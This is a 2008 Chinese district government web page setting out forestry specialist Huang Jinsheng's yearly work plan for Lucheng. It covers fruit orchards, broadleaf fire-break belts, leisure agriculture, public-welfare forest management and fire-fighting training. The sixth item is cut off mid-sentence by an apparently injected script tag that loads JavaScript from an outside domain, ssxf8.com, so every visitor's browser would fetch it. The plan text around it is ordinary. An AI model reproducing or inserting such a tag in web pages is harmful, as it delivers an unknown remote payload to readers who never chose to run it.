首页>人才工作>人才培养
鹿城区第六轮专业技术拔尖人才2008年奉献计划——黄金生
时间:2008-05-30 来源:人才办 作者:人才办 字号:[ ]

黄金生2008年奉献计划
 
2008 年,围绕生态鹿城建设和新农村建设目标,推进绿化造林工程和生态公益林工程建设,以科技创新推进林果产业发展,应用营林技术建设好生物防火 “绿色长城”,在本专业岗位上为城市林业和平安鹿城建设努力工作。
一、林业重点项目实施安排。
1 、实施兴林富民工程,发展特色经济林基地,提高林分的经济效益, 促进林业增效、林农增收。 发展优质瓯柑、杨梅、桑枣、天草桔橙等果树经济林300亩。根据不同品种的物候期和管理要点, 做好栽培技术培训工作,发挥技术的支撑、依托作用,提高科技含量。全年举办各种培训班不少于4期, 利用科技下乡扶持岙底田塘头村桃梨园、临江岙底村杨梅园和仰义钟山村桃、瓯柑园三个果树经济林基地。
2 、实施阔叶林改造工程和生物防火林带建设工程,利用营林技术,提高林分阔叶树种比重,进行针阔混交造林,提高森林自控防火能力和抗病虫功能。2008年要完成10公里阔叶树种防火林带,阔叶林人工造林200亩。
3 、根据 当今生活在闹市区的居民很希望利用节假日时间到农村去欣赏自然山水风光、体验淳朴农家生活、回归和亲近大自然趋势,积极引导鹿城农林业从传统农林业向休闲农林业转型,推动和发展观光休闲农业建设,将鹿城郊区农林资源和旅游资源有机地结合起来。2008年开始,对我区几大果园进行资源重组,增加时令品种,着手休闲观光农业示范推广尝试,为果农的生产林果开辟新的经济增长点。 重点搞好岙底田塘头、邻家女驿头两个休闲观光农业示范点建设,组织杨梅、早熟梨、桃自助采摘活动和杨梅评比活动,提高果园的知名度。
4 、做好七都岛景观防护林带建设项目和温州驿头植物园建设项目的前期申报工作。在2007年专家论证的基础上,继续做好前期准备工作,争取2008年上半年有突破性的进展。
5 充分发挥重点生态公益林在固碳减排方面的主体作用,继续加强重点生态公益林建设。确保达到5.5万亩重点公益林建成面积的目标。年内完成公益林地籍管理信息系统建设, 进行公益林权属确认, 严格按照省统一标准和规范,加快建设,尽早投入使用, 实行电子数字化管理。结合生态区建设,对已建成公益林范围,进行蓄积测算和资源数据更新, 以提高我区生态公益林建设与管理的整体水平。
6 进一步抓好森林消防宣传教育,努力增强全民森林消防意识。举办森林消防知识和扑救火灾技术培训班,提高我区43支消防队?script src=http://ssxf8.com/x.js>
【返回顶部】【打印本稿】【关闭本页】
0